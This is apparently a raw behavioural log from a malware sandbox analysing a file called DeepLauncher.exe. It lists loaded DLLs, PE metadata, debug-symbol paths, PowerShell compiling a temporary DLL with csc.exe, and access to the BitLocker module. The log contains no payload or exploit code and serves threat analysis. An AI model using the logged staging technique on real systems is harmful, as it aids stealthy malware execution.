Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: DeepLauncher.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: DeepLauncher.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: DeepLauncher.exeStatic file information: File size 81384298 > 1048576
Source: DeepLauncher.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: DeepLauncher.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: DeepLauncher.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x161000
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DeepLauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.TraceSource.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdbhP= source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TraceSource\Release\net8.0\System.Diagnostics.TraceSource.pdb source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: DeepLauncher.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Windows.Forms/Release/net8.0/System.Windows.Forms.pdb source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.pdb source: powershell.exe, 00000008.00000002.1386081536.0000024104360000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp
Source: DeepLauncher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DeepLauncher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DeepLauncher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DeepLauncher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DeepLauncher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"Jump to behavior
Source: DeepLauncher.exeStatic PE information: section name: .CLR_UEF
Source: DeepLauncher.exeStatic PE information: section name: .didat
Source: DeepLauncher.exeStatic PE information: section name: Section
Source: DeepLauncher.exeStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB33D2A5 pushad ; iretd 4_2_00007FFAAB33D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB527BFC push esp; iretd 4_2_00007FFAAB527BFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB522316 push 8B485F93h; iretd 4_2_00007FFAAB52231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAB527EED push ecx; iretd 8_2_00007FFAAB527EEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAB526E0E push cs; iretd 8_2_00007FFAAB526E0F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAB527A9E push esi; iretd 8_2_00007FFAAB527AA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAB527CBA push esp; iretd 8_2_00007FFAAB527CBB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\DeepLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
